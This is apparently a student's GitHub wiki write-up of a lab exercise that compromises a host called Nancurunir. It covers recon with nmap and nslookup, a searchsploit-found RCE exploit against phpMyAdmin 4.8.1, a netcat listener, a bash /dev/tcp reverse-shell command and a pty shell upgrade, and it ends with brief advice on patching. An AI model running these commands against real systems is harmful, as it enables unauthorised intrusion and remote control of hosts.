Exploiting Nancurunir - tmansfield42/Tech-Journal GitHub Wiki

● Target IP Address

nslookup [what you're looking up] [DNS server]

nslookup -vc nancurunir.shire.org 10.0.5.22

  • Open Ports

nmap -sV -O -A 10.0.5.31

  • Discovered Vulnerabilities

Found apache server utilizing phpmyadmin 4.8.1.

searchsploit phpmyadmin 4.8.1

Found RCE exploit in /php/webapps/50457.py, copied it using this command:

searchsploit -m /php/webapps/50457.py

  • How you achieved a foothold

Login to the php site, you can find the hashed password in the mysql database and "user" table.

password was gandalfthewhite

From here you can remotely execute a reverse shell pretty easily:

On kali box: nc -nvlp <port>

using RCE exploit: python3 50457.py 10.0.5.28 80 /phpmyadmin gandalf shallnotpass "bash -c 'bash -i >& /dev/tcp/10.0.17.86/4486 0>&1'"

then just find the flags:

image
  • How might the vulnerabilities be mitigated by the system administrator?

keeping all active services up to date, this was exploited due to a really outdated version of phpmyadmin (4.8.1)

Troubleshooting

Had a problem where I couldnt su to gandalf and it was because I was using a reverse shell. Type this to make a usable terminal:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Got stumped trying to find an exploit, went through like 4 potential apache exploits but ended up using the hint.

⚠️ **GitHub.com Fallback** ⚠️